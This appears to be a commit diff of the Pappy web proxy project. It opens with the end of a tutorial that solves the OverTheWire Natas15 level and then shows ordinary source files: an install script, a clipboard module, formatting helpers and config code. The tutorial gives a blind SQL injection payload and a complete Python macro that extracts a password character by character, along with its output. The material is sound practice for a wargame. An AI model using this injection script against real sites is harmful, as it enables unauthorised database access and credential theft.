Awesome! Notice how we didn't have to deal with authentication either. This is because the authentication is handled by the ``Authorization`` header which was included in the generated request.
Time to add the SQL injection part. If we look at the source, we see that this is the SQL query that checks the username::
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
So to escape it, we use a payload like::
username" OR 1=1; #
In this case, any username that ends in ``" OR 1=1; #`` will be considered a valid username. Let's try this out::
pappy> rma brute "foo\" OR 1=1;"
foo" OR 1=1; is a user!
pappy> rma brute "fooooooo\" OR 1=1;"
fooooooo" OR 1=1; is a user!
pappy>
Great! Now we can check any true/false condition we want. In this case, we want to check if a certain character is at a certain position in the ``password`` column. We do this with the ``ASCII`` and ``SUBSTRING`` functions. So something like this will check if the first character is an ``A``.::
'natas16" AND ASCII(SUBSTRING(password, 0, 1)) = 41; #'
Alright, let's update our macro to find the first character of the password.::
from pappyproxy.http import Request, get_request, post_request
from pappyproxy.context import set_tag
MACRO_NAME = 'Macro 41855887'
SHORT_NAME = ''
###########
## Requests
# It's suggested that you call .copy() on these and then edit attributes
# as needed to create modified requests
##
req1 = Request((
'POST /index.php HTTP/1.1\r\n'
'Host: natas15.natas.labs.overthewire.org\r\n'
'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0\r\n'
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n'
'Accept-Language: en-US,en;q=0.5\r\n'
'Accept-Encoding: gzip, deflate\r\n'
'Referer: http://natas15.natas.labs.overthewire.org/\r\n'
'Cookie: __cfduid=db41e9d9b4a13cc3ef4273055b71996fb1450464664\r\n'
'Authorization: Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==\r\n'
'Connection: keep-alive\r\n'
'Content-Type: application/x-www-form-urlencoded\r\n'
'Content-Length: 14\r\n'
'\r\n'
'username=admin'
))
def check_char(char, pos):
payload = 'natas16" AND ASCII(SUBSTRING(password, %d, 1)) = %d; #' % (pos, ord(char))
r = req1.copy()
r.post_params['username'] = payload
r.submit()
if "This user doesn't exist." in r.response.raw_data:
return False
else:
return True
def run_macro(args):
valid_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890"
for c in valid_chars:
print 'Trying %s...' % c
if check_char(c, 1):
print '%s is the first char!' % c
return
print "The script didn't work"
And when we run it...::
pappy> lma
Loaded "<Macro Macro 41855887 (brute)>"
pappy> rma brute
Trying a...
Trying b...
Trying c...
Trying d...
... snip ...
Trying U...
Trying V...
Trying W...
W is the first char!
pappy>
We find the first character! Woo! Next we just have to do this for each position. Even through we don't know the length of the password, we will know that the password is over when none of the characters are valid. So let's update our macro::
import sys
from pappyproxy.http import Request, get_request, post_request
from pappyproxy.context import set_tag
MACRO_NAME = 'Macro 41855887'
SHORT_NAME = ''
###########
## Requests
# It's suggested that you call .copy() on these and then edit attributes
# as needed to create modified requests
##
req1 = Request((
'POST /index.php HTTP/1.1\r\n'
'Host: natas15.natas.labs.overthewire.org\r\n'
'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0\r\n'
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n'
'Accept-Language: en-US,en;q=0.5\r\n'
'Accept-Encoding: gzip, deflate\r\n'
'Referer: http://natas15.natas.labs.overthewire.org/\r\n'
'Cookie: __cfduid=db41e9d9b4a13cc3ef4273055b71996fb1450464664\r\n'
'Authorization: Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==\r\n'
'Connection: keep-alive\r\n'
'Content-Type: application/x-www-form-urlencoded\r\n'
'Content-Length: 14\r\n'
'\r\n'
'username=admin'
))
def check_char(char, pos):
payload = 'natas16" AND ASCII(SUBSTRING(password, %d, 1)) = %d; #' % (pos, ord(char))
r = req1.copy()
r.post_params['username'] = payload
r.submit()
if "This user doesn't exist." in r.response.raw_data:
return False
else:
return True
def run_macro(args):
valid_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890"
password = ''
done = False
while True:
done = True
for c in valid_chars:
# Print the current char to the current line
print c,
sys.stdout.flush()
# Check the current char
if check_char(c, len(password)+1):
# We got the correct char!
password += c
# Print it to the screen
print ''
print '%s is char %d!' % (c, len(password)+1)
print 'The password so far is %s' % password
# We have to do another round
done = False
break
if done:
# We got through the entire alphabet
print ''
print 'Done! The password is "%s"' % password
break
Then we run it::
pappy> lma
Loaded "<Macro Macro 41855887 (brute)>"
pappy> rma brute
a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W
W is char 1!
The password so far is W
a
a is char 2!
The password so far is Wa
a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I
I is char 3!
The password so far is WaI
a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H
H is char 4!
The password so far is WaIH
a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E
... snip ...
The password so far is WaIHEacj63wnNIBROHeqi3p9t0m5nh
a b c d e f g h i j k l m
m is char 31!
The password so far is WaIHEacj63wnNIBROHeqi3p9t0m5nhm
a b c d e f g h
h is char 32!
The password so far is WaIHEacj63wnNIBROHeqi3p9t0m5nhmh
a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 0 1 2 3 4 5 6 7 8 9 0
Done! The password is "WaIHEacj63wnNIBROHeqi3p9t0m5nhmh"
pappy>
Boom! There it is!
Conclusion
==========
That's pretty much all you need to get started with Pappy. Make sure to go through the documentation to learn about all the other features that weren't covered in this tutorial. Hopefully you didn't find Pappy too hard to use and you'll consider it for your next engagement.

147
install.sh
Unescape View File

@ -0,0 +1,147 @@
#!/bin/bash
prompt_yn() {
read -p "$1 (yN) " yn;
case $yn in
[Yy]* ) return 0;;
* ) return 1;;
esac
}
require() {
if ! $@; then
echo "Error running $@, exiting...";
exit 1;
fi
}
GO="$(which go)"
BUILDFLAGS=""
PUPPYREPO="https://github.com/roglew/puppy.git"
PUPPYVERSION="tags/0.2.3"
INSTALLDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
TMPGOPATH="$INSTALLDIR/gopath"
DATADIR="$HOME/.pappy"
VIRTUALENVNAME="pappyenv"
while getopts "g:f:r:dh" opt; do
case $opt in
g)
GO="$OPTARG"
;;
f)
BUILDFLAGS="${OPTARG}"
;;
r)
PUPPYREPO="${OPTARG}"
DEV="yes"
;;
d)
DEV="yes"
;;
h)
echo -e "Build script flags:"
echo -e "-g [path to go]\tUse specific go binary to compile puppy"
echo -e "-f [arguments]\tArguments to pass to \"go build\". ie -f \"-ldflags -s\""
echo -e "-r [git repository link]\t download puppy from an alternate repository"
echo -e "-d\tinstall puppy in development mode by using \"pip install -e\" to install puppy"
echo -e "-h\tprint this help message"
echo -e ""
exit 0;
;;
\?)
echo "Invalid option: -$OPTARG" >&2
exit 1;
;;
esac
done
if ! type "pip" > /dev/null; then
if ! type "easy_install" > /dev/null; then
echo "easy_install not available. Please install easy_install then try again."
exit 1;
fi
if prompt_yn "Installation requires pip. Install pip using \"sudo easy_install pup\"?"; then
require sudo easy_install pip;
else
echo "Please install pip and try the installation again"
exit 1;
fi
fi
if python -c "import pappyproxy" &> /dev/null; then
echo "An earlier version of pappy appears to be installed. Please remove it and try installation again."
echo "This can likely be done by running \"pip uninstall pappyproxy\""
exit 1;
fi
# Set up fake gopath
if [ -z "$GOPATH" ]; then
echo "No GOPATH detected, creating temporary GOPATH at $TMPGOPATH";
export GOPATH="$TMPGOPATH";
fi
require mkdir -p "$GOPATH/src"
# Clone the repo
REPODIR="$GOPATH/src/puppy";
if [ ! -d "$REPODIR" ]; then
# Clone the repo if it doesn't exist
require mkdir -p "$REPODIR";
echo git clone "$PUPPYREPO" "$REPODIR";
require git clone "$PUPPYREPO" "$REPODIR";
fi
# Check out the correct version
cd "$REPODIR";
if [ $DEV ] || [ $REPODIR ]; then
# If it's development, get the most recent version of puppy
require git pull;
else
# if it's not development, get the specified version
require git checkout "$PUPPYVERSION";
fi
cd "$INSTALLDIR"
# Get dependencies
cd "$REPODIR";
echo "Getting puppy dependencies..."
require "$GO" get ./...;
# Build puppy into the data dir
echo "Building puppy into $DATADIR/puppy...";
require mkdir -p "$DATADIR";
require "$GO" build -o "$DATADIR"/puppy $BUILDFLAGS "puppy/cmd/main";
# Clear out old .pyc files
require find "$INSTALLDIR/pappyproxy" -iname "*.pyc" -exec rm -f {} \;
# Set up the virtual environment
if ! type "virtualenv" > /dev/null; then
if prompt_yn "\"virtualenv\" not installed. Install using pip?"; then
require sudo pip install virtualenv
else
exit 1;
fi
fi
VENVDIR="$DATADIR/venv";
require mkdir -p "$VENVDIR";
require virtualenv -p "$(which python3)" "$VENVDIR";
cd "$VENVDIR";
require source bin/activate;
cd "$INSTALLDIR";
if [ -z $DEV ]; then
require pip install -e .
else
require pip install .
fi
echo -e "#!/bin/bash\nsource \"$VENVDIR/bin/activate\";\npappy \$@;\n" > start
chmod +x start;
echo ""
echo "Pappy installed. Run pappy by executing the generated \"start\" script."

1
pappyproxy/.coverage
View File

File diff suppressed because one or more lines are too long

3
pappyproxy/.coveragerc
Unescape View File

@ -1,3 +0,0 @@
[run]
omit = tests/*, schema/*, plugins/*, templates/*

22
pappyproxy/Makefile
Unescape View File

@ -1,22 +0,0 @@
install-third-party:
pip install -e ..
test:
py.test -rw --twisted --cov-config .coveragerc --cov=. tests/
test-verbose:
py.test -v -rw --twisted --cov-config .coveragerc --cov-report term-missing --cov=. tests/
test-macros:
py.test -v -rw --twisted tests/test_macros.py
test-proxy:
py.test -v -rw --twisted tests/test_proxy.py
test-comm:
py.test -v -rw --twisted tests/test_comm.py
test-crypto:
py.test -v -rw --twisted tests/test_crypto.py

1
pappyproxy/__init__.py
Unescape View File

@ -1 +0,0 @@
__version__ = '0.2.13'

7
pappyproxy/__main__.py
Unescape View File

@ -1,7 +0,0 @@
import pappy
from twisted.internet import reactor
if __name__ == '__main__':
reactor.callWhenRunning(pappy.main)
reactor.run()

BIN
pappyproxy/__pycache__/colors.cpython-35.pyc
View File

Binary file not shown.

BIN
pappyproxy/__pycache__/config.cpython-35.pyc
View File

Binary file not shown.

BIN
pappyproxy/__pycache__/console.cpython-35.pyc
View File

Binary file not shown.

BIN
pappyproxy/__pycache__/macros.cpython-35.pyc
View File

Binary file not shown.

BIN
pappyproxy/__pycache__/pap.cpython-35.pyc
View File

Binary file not shown.

BIN
pappyproxy/__pycache__/proxy.cpython-35.pyc
View File

Binary file not shown.

BIN
pappyproxy/__pycache__/util.cpython-35.pyc
View File

Binary file not shown.

386
pappyproxy/clip.py
Unescape View File

@ -0,0 +1,386 @@
"""
Copyright (c) 2014, Al Sweigart
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the {organization} nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import contextlib
import ctypes
import os
import platform
import subprocess
import sys
import time
from ctypes import c_size_t, sizeof, c_wchar_p, get_errno, c_wchar
EXCEPT_MSG = """
Pyperclip could not find a copy/paste mechanism for your system.
For more information, please visit https://pyperclip.readthedocs.org """
PY2 = sys.version_info[0] == 2
text_type = unicode if PY2 else str
class PyperclipException(RuntimeError):
pass
class PyperclipWindowsException(PyperclipException):
def __init__(self, message):
message += " (%s)" % ctypes.WinError()
super(PyperclipWindowsException, self).__init__(message)
def init_osx_clipboard():
def copy_osx(text):
p = subprocess.Popen(['pbcopy', 'w'],
stdin=subprocess.PIPE, close_fds=True)
p.communicate(input=text)
def paste_osx():
p = subprocess.Popen(['pbpaste', 'r'],
stdout=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
return stdout.decode()
return copy_osx, paste_osx
def init_gtk_clipboard():
import gtk
def copy_gtk(text):
global cb
cb = gtk.Clipboard()
cb.set_text(text)
cb.store()
def paste_gtk():
clipboardContents = gtk.Clipboard().wait_for_text()
# for python 2, returns None if the clipboard is blank.
if clipboardContents is None:
return ''
else:
return clipboardContents
return copy_gtk, paste_gtk
def init_qt_clipboard():
# $DISPLAY should exist
from PyQt4.QtGui import QApplication
app = QApplication([])
def copy_qt(text):
cb = app.clipboard()
cb.setText(text)
def paste_qt():
cb = app.clipboard()
return text_type(cb.text())
return copy_qt, paste_qt
def init_xclip_clipboard():
def copy_xclip(text):
p = subprocess.Popen(['xclip', '-selection', 'c'],
stdin=subprocess.PIPE, close_fds=True)
p.communicate(input=text)
def paste_xclip():
p = subprocess.Popen(['xclip', '-selection', 'c', '-o'],
stdout=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
return stdout.decode()
return copy_xclip, paste_xclip
def init_xsel_clipboard():
def copy_xsel(text):
p = subprocess.Popen(['xsel', '-b', '-i'],
stdin=subprocess.PIPE, close_fds=True)
p.communicate(input=text)
def paste_xsel():
p = subprocess.Popen(['xsel', '-b', '-o'],
stdout=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
return stdout.decode()
return copy_xsel, paste_xsel
def init_klipper_clipboard():
def copy_klipper(text):
p = subprocess.Popen(
['qdbus', 'org.kde.klipper', '/klipper', 'setClipboardContents',
text],
stdin=subprocess.PIPE, close_fds=True)
p.communicate(input=None)
def paste_klipper():
p = subprocess.Popen(
['qdbus', 'org.kde.klipper', '/klipper', 'getClipboardContents'],
stdout=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
# Workaround for https://bugs.kde.org/show_bug.cgi?id=342874
# TODO: https://github.com/asweigart/pyperclip/issues/43
clipboardContents = stdout.decode()
# even if blank, Klipper will append a newline at the end
assert len(clipboardContents) > 0
# make sure that newline is there
assert clipboardContents.endswith('\n')
if clipboardContents.endswith('\n'):
clipboardContents = clipboardContents[:-1]
return clipboardContents
return copy_klipper, paste_klipper
def init_no_clipboard():
class ClipboardUnavailable(object):
def __call__(self, *args, **kwargs):
raise PyperclipException(EXCEPT_MSG)
if PY2:
def __nonzero__(self):
return False
else:
def __bool__(self):
return False
return ClipboardUnavailable(), ClipboardUnavailable()
class CheckedCall(object):
def __init__(self, f):
super(CheckedCall, self).__setattr__("f", f)
def __call__(self, *args):
ret = self.f(*args)
if not ret and get_errno():
raise PyperclipWindowsException("Error calling " + self.f.__name__)
return ret
def __setattr__(self, key, value):
setattr(self.f, key, value)
def init_windows_clipboard():
from ctypes.wintypes import (HGLOBAL, LPVOID, DWORD, LPCSTR, INT, HWND,
HINSTANCE, HMENU, BOOL, UINT, HANDLE)
windll = ctypes.windll
safeCreateWindowExA = CheckedCall(windll.user32.CreateWindowExA)
safeCreateWindowExA.argtypes = [DWORD, LPCSTR, LPCSTR, DWORD, INT, INT,
INT, INT, HWND, HMENU, HINSTANCE, LPVOID]
safeCreateWindowExA.restype = HWND
safeDestroyWindow = CheckedCall(windll.user32.DestroyWindow)
safeDestroyWindow.argtypes = [HWND]
safeDestroyWindow.restype = BOOL
OpenClipboard = windll.user32.OpenClipboard
OpenClipboard.argtypes = [HWND]
OpenClipboard.restype = BOOL
safeCloseClipboard = CheckedCall(windll.user32.CloseClipboard)
safeCloseClipboard.argtypes = []
safeCloseClipboard.restype = BOOL
safeEmptyClipboard = CheckedCall(windll.user32.EmptyClipboard)
safeEmptyClipboard.argtypes = []
safeEmptyClipboard.restype = BOOL
safeGetClipboardData = CheckedCall(windll.user32.GetClipboardData)
safeGetClipboardData.argtypes = [UINT]
safeGetClipboardData.restype = HANDLE
safeSetClipboardData = CheckedCall(windll.user32.SetClipboardData)
safeSetClipboardData.argtypes = [UINT, HANDLE]
safeSetClipboardData.restype = HANDLE
safeGlobalAlloc = CheckedCall(windll.kernel32.GlobalAlloc)
safeGlobalAlloc.argtypes = [UINT, c_size_t]
safeGlobalAlloc.restype = HGLOBAL
safeGlobalLock = CheckedCall(windll.kernel32.GlobalLock)
safeGlobalLock.argtypes = [HGLOBAL]
safeGlobalLock.restype = LPVOID
safeGlobalUnlock = CheckedCall(windll.kernel32.GlobalUnlock)
safeGlobalUnlock.argtypes = [HGLOBAL]
safeGlobalUnlock.restype = BOOL
GMEM_MOVEABLE = 0x0002
CF_UNICODETEXT = 13
@contextlib.contextmanager
def window():
"""
Context that provides a valid Windows hwnd.
"""
# we really just need the hwnd, so setting "STATIC"
# as predefined lpClass is just fine.
hwnd = safeCreateWindowExA(0, b"STATIC", None, 0, 0, 0, 0, 0,
None, None, None, None)
try:
yield hwnd
finally:
safeDestroyWindow(hwnd)
@contextlib.contextmanager
def clipboard(hwnd):
"""
Context manager that opens the clipboard and prevents
other applications from modifying the clipboard content.
"""
# We may not get the clipboard handle immediately because
# some other application is accessing it (?)
# We try for at least 500ms to get the clipboard.
t = time.time() + 0.5
success = False
while time.time() < t:
success = OpenClipboard(hwnd)
if success:
break
time.sleep(0.01)
if not success:
raise PyperclipWindowsException("Error calling OpenClipboard")
try:
yield
finally:
safeCloseClipboard()
def copy_windows(text):
# This function is heavily based on
# http://msdn.com/ms649016#_win32_Copying_Information_to_the_Clipboard
with window() as hwnd:
# http://msdn.com/ms649048
# If an application calls OpenClipboard with hwnd set to NULL,
# EmptyClipboard sets the clipboard owner to NULL;
# this causes SetClipboardData to fail.
# => We need a valid hwnd to copy something.
with clipboard(hwnd):
safeEmptyClipboard()
if text:
# http://msdn.com/ms649051
# If the hMem parameter identifies a memory object,
# the object must have been allocated using the
# function with the GMEM_MOVEABLE flag.
count = len(text) + 1
handle = safeGlobalAlloc(GMEM_MOVEABLE,
count * sizeof(c_wchar))
locked_handle = safeGlobalLock(handle)
ctypes.memmove(c_wchar_p(locked_handle), c_wchar_p(text), count * sizeof(c_wchar))
safeGlobalUnlock(handle)
safeSetClipboardData(CF_UNICODETEXT, handle)
def paste_windows():
with clipboard(None):
handle = safeGetClipboardData(CF_UNICODETEXT)
if not handle:
# GetClipboardData may return NULL with errno == NO_ERROR
# if the clipboard is empty.
# (Also, it may return a handle to an empty buffer,
# but technically that's not empty)
return ""
return c_wchar_p(handle).value
return copy_windows, paste_windows
# `import PyQt4` sys.exit()s if DISPLAY is not in the environment.
# Thus, we need to detect the presence of $DISPLAY manually
# and not load PyQt4 if it is absent.
HAS_DISPLAY = os.getenv("DISPLAY", False)
CHECK_CMD = "where" if platform.system() == "Windows" else "which"
def _executable_exists(name):
return subprocess.call([CHECK_CMD, name],
stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
def determine_clipboard():
# Determine the OS/platform and set
# the copy() and paste() functions accordingly.
if 'cygwin' in platform.system().lower():
# FIXME: pyperclip currently does not support Cygwin,
# see https://github.com/asweigart/pyperclip/issues/55
pass
elif os.name == 'nt' or platform.system() == 'Windows':
return init_windows_clipboard()
if os.name == 'mac' or platform.system() == 'Darwin':
return init_osx_clipboard()
if HAS_DISPLAY:
# Determine which command/module is installed, if any.
try:
import gtk # check if gtk is installed
except ImportError:
pass
else:
return init_gtk_clipboard()
try:
import PyQt4 # check if PyQt4 is installed
except ImportError:
pass
else:
return init_qt_clipboard()
if _executable_exists("xclip"):
return init_xclip_clipboard()
if _executable_exists("xsel"):
return init_xsel_clipboard()
if _executable_exists("klipper") and _executable_exists("qdbus"):
return init_klipper_clipboard()
return init_no_clipboard()
def set_clipboard(clipboard):
global copy, paste
clipboard_types = {'osx': init_osx_clipboard,
'gtk': init_gtk_clipboard,
'qt': init_qt_clipboard,
'xclip': init_xclip_clipboard,
'xsel': init_xsel_clipboard,
'klipper': init_klipper_clipboard,
'windows': init_windows_clipboard,
'no': init_no_clipboard}
copy, paste = clipboard_types[clipboard]()
copy, paste = determine_clipboard()

114
pappyproxy/colors.py
Unescape View File

@ -1,6 +1,12 @@
import re
import itertools
from pygments import highlight
from pygments.lexers.data import JsonLexer
from pygments.lexers.html import XmlLexer
from pygments.lexers import get_lexer_for_mimetype, HttpLexer
from pygments.formatters import TerminalFormatter
def clen(s):
ansi_escape = re.compile(r'\x1b[^m]*m')
return len(ansi_escape.sub('', s))
@ -96,20 +102,96 @@ def path_formatter(path, width=-1):
colparts.append(c+p+Colors.ENDC)
return '/'.join(colparts)
def host_color(host):
def color_string(s, color_only=False):
"""
Return the string with a a color/ENDC. The same string will always be the same color.
"""
from .util import str_hash_code
# Give each unique host a different color (ish)
if not host:
return Colors.RED
hostcols = [Colors.RED,
Colors.GREEN,
Colors.YELLOW,
Colors.BLUE,
Colors.MAGENTA,
Colors.CYAN,
Colors.LRED,
Colors.LGREEN,
Colors.LYELLOW,
Colors.LBLUE,
Colors.LMAGENTA,
Colors.LCYAN]
return hostcols[hash(host)%(len(hostcols)-1)]
if not s:
return ""
strcols = [Colors.RED,
Colors.GREEN,
Colors.YELLOW,
Colors.BLUE,
Colors.MAGENTA,
Colors.CYAN,
Colors.LRED,
Colors.LGREEN,
Colors.LYELLOW,
Colors.LBLUE,
Colors.LMAGENTA,
Colors.LCYAN]
col = strcols[str_hash_code(s)%(len(strcols)-1)]
if color_only:
return col
else:
return col + s + Colors.ENDC
def pretty_msg(msg):
to_ret = pretty_headers(msg) + '\r\n' + pretty_body(msg)
return to_ret
def pretty_headers(msg):
to_ret = msg.headers_section()
to_ret = highlight(to_ret, HttpLexer(), TerminalFormatter())
return to_ret
def pretty_body(msg):
from .util import printable_data
to_ret = printable_data(msg.body, colors=False)
if 'content-type' in msg.headers:
try:
lexer = get_lexer_for_mimetype(msg.headers.get('content-type').split(';')[0])
to_ret = highlight(to_ret, lexer, TerminalFormatter())
except:
pass
return to_ret
def url_formatter(req, colored=False, always_have_path=False, explicit_path=False, explicit_port=False):
retstr = ''
if not req.use_tls:
if colored:
retstr += Colors.RED
retstr += 'http'
if colored:
retstr += Colors.ENDC
retstr += '://'
else:
retstr += 'https://'
if colored:
retstr += color_string(req.dest_host)
else:
retstr += req.dest_host
if not ((req.use_tls and req.dest_port == 443) or \
(not req.use_tls and req.dest_port == 80) or \
explicit_port):
if colored:
retstr += ':'
retstr += Colors.MAGENTA
retstr += str(req.dest_port)
retstr += Colors.ENDC
else:
retstr += ':{}'.format(req.dest_port)
if (req.url.path and req.url.path != '/') or always_have_path:
if colored:
retstr += path_formatter(req.url.path)
else:
retstr += req.url.path
if req.url.params:
retstr += '?'
params = req.url.params.split("&")
pairs = [tuple(param.split("=")) for param in params]
paramstrs = []
for k, v in pairs:
if colored:
paramstrs += (Colors.GREEN + '{}' + Colors.ENDC + '=' + Colors.LGREEN + '{}' + Colors.ENDC).format(k, v)
else:
paramstrs += '{}={}'.format(k, v)
retstr += '&'.join(paramstrs)
if req.url.fragment:
retstr += '#%s' % req.url.fragment
return retstr

112
pappyproxy/comm.py
Unescape View File

@ -1,112 +0,0 @@
import sys
import base64
import json
from twisted.protocols.basic import LineReceiver
from twisted.internet import defer
from util import PappyException
"""
comm.py
Handles creating a listening server bound to localhost that other processes can
use to interact with the proxy.
"""
debug = False
class CommServer(LineReceiver):
MAX_LENGTH=sys.maxint
def __init__(self):
self.delimiter = '\n'
self.action_handlers = {
'ping': self.action_ping,
'get_request': self.action_get_request,
'get_response': self.action_get_response,
'submit': self.action_submit_request,
}
def lineReceived(self, line):
line = line.strip()
if line == '':
return
#try:
command_data = json.loads(line)
command = command_data['action']
valid = False
if command in self.action_handlers:
valid = True
result = {'success': True}
func_defer = self.action_handlers[command](command_data)
func_defer.addCallback(self.action_result_handler, result)
func_defer.addErrback(self.action_error_handler, result)
if not valid:
raise PappyException('%s is an invalid command' % command_data['action'])
# except PappyException as e:
# return_data = {'success': False, 'message': str(e)}
# self.sendLine(json.dumps(return_data))
def action_result_handler(self, data, result):
result.update(data)
self.sendLine(json.dumps(result))
def action_error_handler(self, error, result):
if debug:
print error.getTraceback()
return_data = {'success': False, 'message': str(error.getTraceback())}
result.update(result)
error.trap(Exception)
self.sendLine(json.dumps(return_data))
return True
def action_ping(self, data):
return defer.succeed({'ping': 'pong'})
@defer.inlineCallbacks
def action_get_request(self, data):
from .http import Request
try:
reqid = data['reqid']
req = yield Request.load_request(reqid)
except KeyError:
raise PappyException("Request with given ID does not exist")
dat = json.loads(req.to_json())
defer.returnValue(dat)
@defer.inlineCallbacks
def action_get_response(self, data):
from .http import Request, Response
try:
reqid = data['reqid']
req = yield Request.load_request(reqid)
except KeyError:
raise PappyException("Request with given ID does not exist, cannot fetch associated response.")
if req.response:
rsp = req.response
dat = json.loads(rsp.to_json())
else:
dat = {}
defer.returnValue(dat)
@defer.inlineCallbacks
def action_submit_request(self, data):
from .http import Request
from .plugin import active_intercepting_macros
message = base64.b64decode(data['full_message'])
req = Request(message)
req.host = data['host'].encode('utf-8')
req.port = data['port']
req.is_ssl = data['is_ssl']
yield req.async_submit(mangle=True)
if 'tags' in data:
req.tags = set(data['tags'])
yield req.async_deep_save()
retdata = {}
retdata['request'] = json.loads(req.to_json())
if req.response:
retdata['response'] = json.loads(req.response.to_json())
defer.returnValue(retdata)

84
pappyproxy/compress.py
Unescape View File

@ -1,84 +0,0 @@
#!/usr/bin/env python
import crochet
import glob
import pappyproxy
import zipfile
import tarfile
try:
import bz2
except ImportError:
bz2 = None
print "BZ2 not installed on your system"
from base64 import b64encode, b64decode
from os import getcwd, sep, path, urandom
class Compress(object):
def __init__(self, sessconfig):
self.config = sessconfig
self.zip_archive = sessconfig.archive
self.bz2_archive = sessconfig.archive
def compress_project(self):
if bz2:
self.tar_project()
else:
self.zip_project()
def decompress_project(self):
if bz2:
self.untar_project()
else:
self.unzip_project()
def zip_project(self):
"""
Zip project files
Using append mode (mode='a') will create a zip archive
if none exists in the project.
"""
try:
zf = zipfile.ZipFile(self.zip_archive, mode="a")
zf.write(self.config.crypt_dir)
zf.close()
except zipfile.LargeZipFile as e:
raise PappyException("Project zipfile too large. Error: ", e)
def unzip_project(self):
"""
Extract project files from decrypted zip archive.
Initially checks the zip archive's magic number and
attempts to extract pappy.json to validate integrity
of the zipfile.
"""
if not zipfile.is_zipfile(self.zip_archive):
raise PappyException("Project archive corrupted.")
zf = zipfile.ZipFile(self.zip_archive)
try:
zf.extract("config.json")
except zipfile.BadZipfile as e:
raise PappyException("Zip archive corrupted. Error: ", e)
zf.extractall()
def tar_project(self):
archive = tarfile.open(self.bz2_archive, 'w:bz2')
archive.add(self.config.crypt_dir)
archive.close()
def untar_project(self):
if tarfile.is_tarfile(self.bz2_archive):
# Raise exception if there is a failure
try:
with tarfile.open(self.bz2_archive, "r:bz2") as archive:
archive.extractall()
except tarfile.ExtractError as e:
raise PappyException("Tar archive corrupted. Error: ", e)

398
pappyproxy/config.py
Unescape View File

@ -1,289 +1,129 @@
import glob
import copy
import json
import os
import shutil
class PappyConfig(object):
"""
The configuration settings for the proxy. To access the config object for the
current session (eg from plugins) use ``pappyproxy.pappy.session.config``.
.. data:: cert_dir
The location of the CA certs that Pappy will use. This can be configured in the
``config.json`` file for a project.
:Default: ``{DATADIR}/certs``
.. data:: pappy_dir
The file where pappy's scripts are located. Don't write anything here, and you
probably don't need to write anything here. Use DATA_DIR instead.
:Default: Wherever the scripts are installed
.. data:: data_dir
The data directory. This is where files that have to be read by Pappy every time
it's run are put. For example, plugins are stored in ``{DATADIR}/plugins`` and
certs are by default stored in ``{DATADIR}/certs``. This defaults to ``~/.pappy``
and isn't configurable right now.
:Default: ``~/.pappy``
.. data:: datafile
The location of the CA certs that Pappy will use. This can be configured in the
``config.json`` file for a project.
:Default: ``data.db``
.. data:: debug_dir
The directory to write debug output to. Don't put this outside the project folder
since it writes all the request data to this directory. You probably won't need
to use this. Configured in the ``config.json`` file for the project.
:Default: None
.. data:: listeners
The list of active listeners. It is a list of dictionaries of the form `{"port": 8000, "interface": "127.0.0.1"}`
Not modifiable after startup. Configured in the ``config.json`` file for the project.
:Default: ``[]``
.. data:: socks_proxy
Details for a SOCKS proxy. It is a dict with the following key/values::
host: The SOCKS proxy host
port: The proxy port
username: Username (optional)
password: Password (optional)
If null, no proxy will be used.
:Default: ``null``
.. data:: http_proxy
default_config = """{
"listeners": [
{"iface": "127.0.0.1", "port": 8080}
],
"proxy": {"use_proxy": false, "host": "", "port": 0, "is_socks": false}
}"""
Details for an upstream HTTP proxy. It is a dict with the following key/values::
host: The proxy host
port: The proxy port
username: Username (optional)
password: Password (optional)
If null, no proxy will be used.
.. data:: plugin_dirs
List of directories that plugins are loaded from. Not modifiable.
